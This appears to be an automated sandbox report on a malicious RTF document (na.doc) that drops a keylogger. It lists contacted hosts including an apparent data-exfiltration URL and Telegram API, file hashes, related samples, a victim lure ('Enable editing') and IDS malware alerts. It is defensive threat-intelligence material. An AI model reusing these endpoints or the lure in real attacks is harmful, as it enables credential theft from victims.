                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://crl.entrust.net/2048ca.crl0cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedcdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      unknown
IP               Domain               Country         ASN    ASN Name            Malicious
132.226.8.169    checkip.dyndns.com   United States   16989  UTMEMUS             false
149.154.167.220  api.telegram.org     United Kingdom  62041  TELEGRAMRU          true
188.114.97.3     unknown              European Union  13335  CLOUDFLARENETUS     false
87.120.84.38     unknown              Bulgaria        51189  SHARCOM-ASBG        true
193.122.6.168    unknown              United States   31898  ORACLE-BMC-31898US  false
188.114.96.3     reallyfreegeoip.org  European Union  13335  CLOUDFLARENETUS     true
193.122.130.0    unknown              United States   31898  ORACLE-BMC-31898US  false
158.101.44.242   unknown              United States   31898  ORACLE-BMC-31898US  false
132.226.247.73   unknown              United States   16989  UTMEMUS             false
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1545180
                                                                                      Start date and time:2024-10-30 08:18:26 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 8s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:13
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:na.doc
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.expl.evad.winDOC@9/14@28/9
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 33.3%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 93
                                                                                      • Number of non-executed functions: 133
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .doc
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Active ActiveX Object
                                                                                      • Scroll down
                                                                                      • Close Viewer
                                                                                      • Override analysis time to 74287.3930392778 for current running targets taking high CPU consumption
                                                                                      • Override analysis time to 148574.786078556 for current running targets taking high CPU consumption
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3256 because there are no executed function
                                                                                      • Execution Graph export aborted for target cdlpohayugo39567.exe, PID 3512 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: na.doc
Time      Type             Description
03:19:37  API Interceptor  284x Sleep call for process: EQNEDT32.EXE modified
03:19:41  API Interceptor  7004699x Sleep call for process: cdlpohayugo39567.exe modified
03:19:43  API Interceptor  19x Sleep call for process: powershell.exe modified
                                                                                                          • 104.21.74.191
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                                          • 188.114.97.3
                                                                                                          PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 104.21.74.191
                                                                                                          UTMEMUSna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Bill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          SHARCOM-ASBGna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                                          • 87.120.84.39
                                                                                                          Proforma Invoice347.docGet hashmaliciousNanocoreBrowse
                                                                                                          • 87.120.84.38
                                                                                                          Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousVIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 87.120.84.38
                                                                                                          na.docGet hashmaliciousFormBookBrowse
                                                                                                          • 87.120.84.38
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          05af1f5ca1b87cc9cc9b25185115607dna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 188.114.96.3
                                                                                                          AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          1.rtfGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          ingswhic.docGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          swithnew.docGet hashmaliciousRemcosBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 188.114.96.3
                                                                                                          36f7277af969a6947a61ae0b815907a1na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          No context
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:@...e...........................................................
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):787968
                                                                                                          Entropy (8bit):7.706822105480993
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:xYyLre2zSoe7IAf7r1wqJnwQEHDpBcUUOaUh3RadG4rIebdySybB7hGYrFTk9:+5ovAf9rnu/BUOaUh3krJGFhGAW9
                                                                                                          MD5:879B4E39A671B826E59EE54A75714CC7
                                                                                                          SHA1:996E3EBD99743215F28FB59BC7940B376140C298
                                                                                                          SHA-256:35FE6053D71A6E8EE7FBBB9BC7E6B0F1F40512F567E64B074FB5CDD3D246C219
                                                                                                          SHA-512:15B5FEEAC3C870DE154E14E7BFCA475EFEB7E24B7AC643AD3059FEAE32BC8810CEA56687CA568105AC34D3EA84656546AE5DF29967654529C7E20C7DA9A0B1C1
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 67%
                                                                                                          Reputation:low
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16384
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3::
                                                                                                          MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1886720
                                                                                                          Entropy (8bit):3.3964766189950852
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:pyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryea:UA
                                                                                                          MD5:13F489D240B262F674D1E074C6290FCF
                                                                                                          SHA1:3D45281E728018F8CC09AF5D2A070F72F87B3B04
                                                                                                          SHA-256:5692C0213670C4440BE4F0A50878053A58A9530BBA37E278FABCB9745568D5B4
                                                                                                          SHA-512:806A415E3551F6E9CBAD87B20A3FE16C5233B3DCAA85918454AFE62C6FA6549E603EB341440E854352AC8542B943DBE29D35A1B5758B468F6DDB90C41D96C5E4
                                                                                                          Malicious:false
                                                                                                          Preview:7.5.0.2.1.7.0.3.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1536
                                                                                                          Entropy (8bit):1.354265440522515
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbk:IiiiiiiiiifdLloZQc8++lsJe1MzH
                                                                                                          MD5:F90E9BBACA2635406674FD02695B6C96
                                                                                                          SHA1:25140CEDE9A7773F8C5986370CD912D5BE6400C7
                                                                                                          SHA-256:EEA2A3D997A33D6B1F4BA4EA67F2B5AC2C00090E784732688149818883D1AAF0
                                                                                                          SHA-512:68E5AF482C50C9C4B3961B4FAED162BFBA8445D8F3E8FE468393C8AD2EC2B44C7E00C2BB377D942477F582060D45D85A5BBBFF50DCFFE13C8C652FF7E713F268
                                                                                                          Malicious:false
                                                                                                          Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1024
                                                                                                          Entropy (8bit):0.05390218305374581
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                          Malicious:false
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1
                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Preview:1
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38
                                                                                                          Entropy (8bit):4.195295934496219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:M19m42Uv:M9
                                                                                                          MD5:85AFAECA1F119568BFA70BB4ED76F108
                                                                                                          SHA1:13DA0EB4D0361D0A4CD1DD38DBECA56DEB273457
                                                                                                          SHA-256:3211DF2212BAF22DF462140F37EC16A81483BFB4DE4796F24A0708390601F0F8
                                                                                                          SHA-512:4E5C577D753BF15471DA27D3EEE34FCE86E388414FA1177E3BCF877827C82750F23C8EDB64B83CF7E55C69D5FCB2BD18941E81A353F8458A0685D358C1E9D3A6
                                                                                                          Malicious:false
                                                                                                          Preview:[doc]..na.LNK=0..[folders]..na.LNK=0..
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Oct 30 06:19:35 2024, length=1838683, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):968
                                                                                                          Entropy (8bit):4.49250081222583
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:88djE0gXg/XAlCPCHaXYKB4bB/Dr8xX+WWLF9OmicvbZ1LI8DtZ3YilMMEpxRljK:88d4k/XTZWxOG9ae11LDDv3qt57u
                                                                                                          MD5:276A4CCD4D119BBE21A5692B55DD5424
                                                                                                          SHA1:44EB40EC7F18475C9A9177191E89FCC5B4F8C464
                                                                                                          SHA-256:56B1D9154A28B6EB6B4530285155E3BDDE7E40D018932931122123F9E96DE543
                                                                                                          SHA-512:A982D148FA2982C512ED5E387DBB445CB3216BB4878B2694F6690DE4086D35ADD331F18754D15D78820EE1822574869A9A38C90D587B3C3A76F53012A69B1D27
                                                                                                          Malicious:false
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):2.4797606462020307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                          Malicious:false
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2
                                                                                                          Entropy (8bit):1.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                          Malicious:false
                                                                                                          Preview:..
                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):787968
                                                                                                          Entropy (8bit):7.706822105480993
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:xYyLre2zSoe7IAf7r1wqJnwQEHDpBcUUOaUh3RadG4rIebdySybB7hGYrFTk9:+5ovAf9rnu/BUOaUh3krJGFhGAW9
                                                                                                          MD5:879B4E39A671B826E59EE54A75714CC7
                                                                                                          SHA1:996E3EBD99743215F28FB59BC7940B376140C298
                                                                                                          SHA-256:35FE6053D71A6E8EE7FBBB9BC7E6B0F1F40512F567E64B074FB5CDD3D246C219
                                                                                                          SHA-512:15B5FEEAC3C870DE154E14E7BFCA475EFEB7E24B7AC643AD3059FEAE32BC8810CEA56687CA568105AC34D3EA84656546AE5DF29967654529C7E20C7DA9A0B1C1
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 67%
                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):162
                                                                                                          Entropy (8bit):2.4797606462020307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                                                          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                                                          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                                                          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                                                          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                                                          Malicious:true
                                                                                                          File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (65336), with CR line terminators
                                                                                                          Entropy (8bit):4.3024711324840075
                                                                                                          TrID:
                                                                                                          • Rich Text Format (4004/1) 100.00%
                                                                                                          File name:na.doc
                                                                                                          File size:1'838'683 bytes
                                                                                                          MD5:657e7d38172b5294be8ff81a94efe745
                                                                                                          SHA1:e00cce89c60742889474451b7306ac6bd3c80430
                                                                                                          SHA256:89054ad8d24c60063c31b9c2deede4c43b6a6a84da9f657b3450a4c2346c03e3
                                                                                                          SHA512:288088e6cc702c845ce73d0bac85c014bd688c860313463146ac7acb597bc9e3c2c99261682e52a6202be3a922af32cea3e8d275142dc80108aaf67379a6d629
                                                                                                          SSDEEP:6144:uwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAA:b
                                                                                                          TLSH:9885922DD34B02598F620377AB571E5142BDBA7EF38552A1302C537933EAC3DA1252BE
                                                                                                          File Content Preview:{\rt..{\*\1LDUe81hMKlnPP1nKASZ19ZOKBqddO2quFmxo0MtEKrExBRHcyxLvwjB2nisPdhka10eXQHX0tX9IpV6AHD55BqRb7ksA8oUyv56EBTeaHx5p8rIsMNMvdWCvP68Lg47yF8qJ2ZIsmHayr9seVbhq6RTvxvEJ25fUHKOBnETngf98o4sNz3cFMGJT2O}..{\175021703please click Enable editing from the yellow
                                                                                                          Icon Hash:2764a3aaaeb7bdbf
                                                                                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                          2024-10-30T08:19:41.177030+0100 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 87.120.84.38 | 80 | 192.168.2.22 | 49161 | TCP
                                                                                                          2024-10-30T08:19:41.359672+0100 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 87.120.84.38 | 80 | 192.168.2.22 | 49161 | TCP
                                                                                                          2024-10-30T08:19:47.874537+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49162 | 132.226.8.169 | 80 | TCP
                                                                                                          2024-10-30T08:19:50.122483+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49162 | 132.226.8.169 | 80 | TCP
                                                                                                          2024-10-30T08:19:50.707109+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49164 | 188.114.96.3 | 443 | TCP
                                                                                                          2024-10-30T08:19:52.660592+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49165 | 132.226.8.169 | 80 | TCP
                                                                                                          2024-10-30T08:19:54.501299+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49167 | 132.226.8.169 | 80 | TCP
                                                                                                          2024-10-30T08:19:55.083249+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49168 | 188.114.97.3 | 443 | TCP
